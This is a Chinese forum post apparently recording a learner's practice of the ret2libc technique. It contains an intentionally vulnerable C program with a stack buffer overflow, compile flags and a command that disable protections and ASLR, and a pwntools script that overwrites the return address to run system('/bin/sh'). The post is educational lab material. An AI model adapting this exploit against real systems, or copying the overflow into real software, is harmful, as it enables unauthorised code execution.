-
-
[原创]Ret2libc 学习记录笔记
-
2021-6-11 21:36
14240
-
Ret2libc 练习记录笔记
前言
夫霸天下者有三戒,毋贪,毋忿,毋急。贪则多失,忿则多难,急则多蹶。夫审大小而图之,乌用贪?衡彼己而施之,乌用忿?酌缓急而布之,乌用急?君能戒此三者,于霸也近矣。
一;什么是Ret2libc 技术。
它是指的是劫持程序流程利用程序当中已经存在得指令来执行。多用在栈不可执行得情况。
二;举例:
2.1;程序源码
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
void vulnerable_function()
{
char buf[128];
read(STDIN_FILENO, buf, 256);
}
int main(int argc, char** argv)
{
vulnerable_function();
write(STDOUT_FILENO, "Hello, World\n", 13);
}
2.2;编译指令
gcc -m32 -fno-stack-protector -no-pie -o test test.c
2.3;检查程序保护技术
注释:-no-pie只是针对编译的ELF文件做了随机化,libc加载地址跟/proc/sys/kernel/randomize_va_space有关,echo 0 >/proc/sys/kernel/randomize_va_space
2.4;测试思路
使用gdb 进行调试,运行程序并且获取函数system地址,以及参数“/bin/sh”的地址,然后设计溢出劫持程序流程来是程序运行system('/bin/sh')。
2.5;调试
设置断点,运行程序,使system()加载。
获取system函数以及参数的地址
生成字符穿,计算溢出点
构造分析:
注释;图中有一个难理解的地方,即覆盖system函数的地址后面为什么需要紧接这一个"ret"然后才是参数“/bin/sh”。其实该"ret"的值可以是任意。他的作用可以说就是为了在调用system() 函数压入参数的时候将“/bin/sh”压入。假定程序在正常执行时ret 的时候,原本可以正常跳转出去,但是现在ret 的位置被修改成为“system()”函数。所以执行完ret 指令之后,EIP的值是system(),也就是说下一步就是执行函数system()。所以,程序会在[EBP+8] 的位置找寻参数。下图为正常函数调用之后的栈空间示意图:
exp
from pwn import *
p = process('./test')
#print 'pid' + str(proc.pidof(p))
ret=0x56556226
a = 0xf7e0a830
b = 0xf7f57352
payload = 'a'*140 + p32(a) + p32(ret) + p32(b)
#pause()
p.send(payload)
p.interactive()
效果展示:
调试exp,修改exp
from pwn import *
p = process('./test')
print 'pid' + str(proc.pidof(p))
ret=0x56556226
a = 0xf7e0a830
b = 0xf7f57352
payload = 'a'*140 + p32(a) + p32(ret) + p32(b)
pause()
p.send(payload)
p.interactive()
[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法
最后于 2021-6-13 19:29
被天象独行编辑
,原因: